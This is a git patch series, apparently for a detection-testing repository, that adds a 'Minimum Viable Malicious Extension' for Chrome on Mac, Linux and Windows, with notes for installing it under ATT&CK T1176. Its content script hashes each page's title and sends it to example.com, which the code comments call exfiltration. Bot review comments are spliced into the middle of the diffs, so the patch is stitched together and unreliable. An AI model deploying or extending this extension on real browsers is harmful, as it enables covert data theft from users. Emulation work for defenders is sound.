From 5d20c6b6dce9c468330b1f0577bf2460e986b89d Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 12:46:47 +1100
Subject: [PATCH 01/10] add a 'minimum viable malicious extension' payload + collection notes for Mac

---
 Mac/Collection/Browser_Extensions.md | 10 ++++++
 Mac/Payloads/Browser_Extension/inline.js | 37 ++++++++++++++++++++
 Mac/Payloads/Browser_Extension/manifest.json | 16 +++++++++
 3 files changed, 63 insertions(+)
 create mode 100644 Mac/Collection/Browser_Extensions.md
 create mode 100644 Mac/Payloads/Browser_Extension/inline.js
 create mode 100644 Mac/Payloads/Browser_Extension/manifest.json

diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..a8b5f435
--- /dev/null
+++ b/Mac/Collection/Browser_Extensions.md
@@ -0,0 +1,10 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
+Then click 'Select'
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/manifest.json
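Review bot: `var athing = hexCodes.join("");` in `hex` is assigned and never read while the next line recomputes the same join; drop the local (`return hexCodes.join("");` alone) and add the semicolons missing on the `console.log`, `var value`, `var stringValue`, `var padding` and `var paddedValue` lines. `new TextEncoder("utf-8")` passes an argument the constructor ignores, so `new TextEncoder()` is the documented form. The chain `crypto.subtle.digest("SHA-256", buffer).then(callUrl)` has no rejection handler, and `crypto.subtle` is undefined outside a secure context, so on a plain-http page the content script most likely dies with an uncaught TypeError instead of producing the request the comment describes; a `.catch` that logs the failure would make the test outcome visible either way. The file-level `var digest = exfil(document.title);` holds a Promise rather than the hex digest, so the name misleads, and a header comment stating the observable this test payload generates (one GET from each matching tab to `https://example.com/<64 hex chars>` plus the `Exfiltrating data to` console line) would give the detection side something concrete to alert on. Patch 02 re-applies this file byte-for-byte, and the identical copies in patch 06 (Linux) and patch 07 (Windows) carry the same issues.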
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
From 9d247c281db19f9b34b4baa7b80b01cbdec7cc13 Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 12:46:47 +1100
Subject: [PATCH 02/10] add a 'minimum viable malicious extension' payload + collection notes for Mac

---
 Mac/Collection/Browser_Extensions.md | 10 ++++++
 Mac/Payloads/Browser_Extension/inline.js | 37 ++++++++++++++++++++
 Mac/Payloads/Browser_Extension/manifest.json | 16 +++++++++
 3 files changed, 63 insertions(+)
 create mode 100644 Mac/Collection/Browser_Extensions.md
 create mode 100644 Mac/Payloads/Browser_Extension/inline.js
 create mode 100644 Mac/Payloads/Browser_Extension/manifest.json

diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..a8b5f435
--- /dev/null
+++ b/Mac/Collection/Browser_Extensions.md
@@ -0,0 +1,10 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
+Then click 'Select'
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/inline.js
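Review bot: `"matches": [""]` is not a valid match pattern, so this manifest should fail Chrome's validation at load time rather than attach `inline.js` to any page; an angle-bracketed value may have been lost when the patch was extracted, so the intended pattern should be confirmed against the repository before relying on these notes. For a detection test it is also worth scoping the pattern to a single test origin you control instead of every site, which keeps the payload's network behaviour bounded and makes the expected alert reproducible, and a `"description"` that names the repository and the ATT&CK technique would help anyone triaging the installed extension recognise it as a test artefact. The copies of this file in patches 02, 06 and 07 are identical and need the same check.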
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Mac/Payloads/Browser_Extension/manifest.json
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
From d203930a36b1efec9ca54a397e179ff02e2fcf3a Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 12:54:52 +1100
Subject: [PATCH 03/10] can't markdown

---
 Mac/Collection/Browser_Extensions.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
index a8b5f435..a2ad23e7 100644
--- a/Mac/Collection/Browser_Extensions.md
+++ b/Mac/Collection/Browser_Extensions.md
@@ -6,5 +6,5 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
 ### Chrome
 
 Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension]
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payload/Browser_Extension/)
 Then click 'Select'
\ No newline at end of file
From e99ab35460d70852363f9c25caf74495c0818acf Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 12:55:34 +1100
Subject: [PATCH 04/10] can't markdown

---
 Mac/Collection/Browser_Extensions.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
index a2ad23e7..f38f59f4 100644
--- a/Mac/Collection/Browser_Extensions.md
+++ b/Mac/Collection/Browser_Extensions.md
@@ -6,5 +6,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
 ### Chrome
 
 Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
-Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payload/Browser_Extension/)
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
 Then click 'Select'
\ No newline at end of file
From e52c8a8980a52326e914249109da05cba2d8ec70 Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 13:08:47 +1100
Subject: [PATCH 05/10] finishing mac bits

---
 Mac/Persistence/Browser_Extensions.md | 12 ++++++++++++
 Mac/README.md | 4 ++--
 2 files changed, 14 insertions(+), 2 deletions(-)
 create mode 100644 Mac/Persistence/Browser_Extensions.md

diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Mac/Persistence/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Mac/README.md b/Mac/README.md
index 2b7c6cad..457ba910 100644
--- a/Mac/README.md
+++ b/Mac/README.md
@@ -3,8 +3,8 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy | +| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory 
Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | | Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | | LC_LOAD_DYLIB Addition | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | File Deletion | [Input Prompt](Credential_Access/Input_Prompt.md) | [Permission Groups Discovery](Discovery/Permissions_Groups_Discovery.md) | Remote Services | Scripting | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | From e4b8cdb9c20cfc748e61352b85174b1a30e6b427 Mon Sep 17 00:00:00 2001 
From: Dan Bourke
Date: Mon, 26 Feb 2018 13:13:39 +1100
Subject: [PATCH 06/10] add linux browser extension docs and payload

---
 Linux/Collection/Browser_Extensions.md | 12 ++++++
 Linux/Payloads/Browser_Extension/inline.js | 37 +++++++++++++++++++
 .../Payloads/Browser_Extension/manifest.json | 16 ++++++++
 Linux/Persistence/Browser_Extensions.md | 12 ++++++
 Linux/README.md | 16 ++++----
 5 files changed, 85 insertions(+), 8 deletions(-)
 create mode 100644 Linux/Collection/Browser_Extensions.md
 create mode 100644 Linux/Payloads/Browser_Extension/inline.js
 create mode 100644 Linux/Payloads/Browser_Extension/manifest.json
 create mode 100644 Linux/Persistence/Browser_Extensions.md

diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Linux/Collection/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/manifest.json
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Linux/Persistence/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Linux/README.md b/Linux/README.md
index 825187fd..7c2cc91c 100644
--- a/Linux/README.md
+++ b/Linux/README.md
@@ -4,14 +4,14 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | -| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | 
-| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | -| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | -| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | +| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom 
Cryptographic Protocol | +| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels | +| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | | | | | | | Remote File Copy | | | | Scripting | | | | | | | Standard Application Layer Protocol | From f5c852b834b61a72ab6dd2ceaf117b422ce0fc84 Mon Sep 17 00:00:00 2001 
From: Dan Bourke
Date: Mon, 26 Feb 2018 13:14:07 +1100
Subject: [PATCH 07/10] add windows browser extension docs and payload

---
 Windows/Collection/Browser_Extensions.md | 12 ++++++
 Windows/Payloads/Browser_Extension/inline.js | 37 +++++++++++++++++++
 .../Payloads/Browser_Extension/manifest.json | 16 ++++++++
 Windows/Persistence/Browser_Extensions.md | 12 ++++++
 Windows/README.md | 4 +-
 5 files changed, 79 insertions(+), 2 deletions(-)
 create mode 100644 Windows/Collection/Browser_Extensions.md
 create mode 100644 Windows/Payloads/Browser_Extension/inline.js
 create mode 100644 Windows/Payloads/Browser_Extension/manifest.json
 create mode 100644 Windows/Persistence/Browser_Extensions.md

diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Windows/Collection/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Windows/Payloads/Browser_Extension/inline.js b/Windows/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Windows/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Windows/Payloads/Browser_Extension/manifest.json b/Windows/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Windows/Payloads/Browser_Extension/manifest.json
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Windows/Persistence/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Windows/README.md b/Windows/README.md
index 1228cf4b..c1480d8e 100644
--- a/Windows/README.md
+++ b/Windows/README.md
@@ -4,11 +4,11 @@ |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs 
| Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | -| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query 
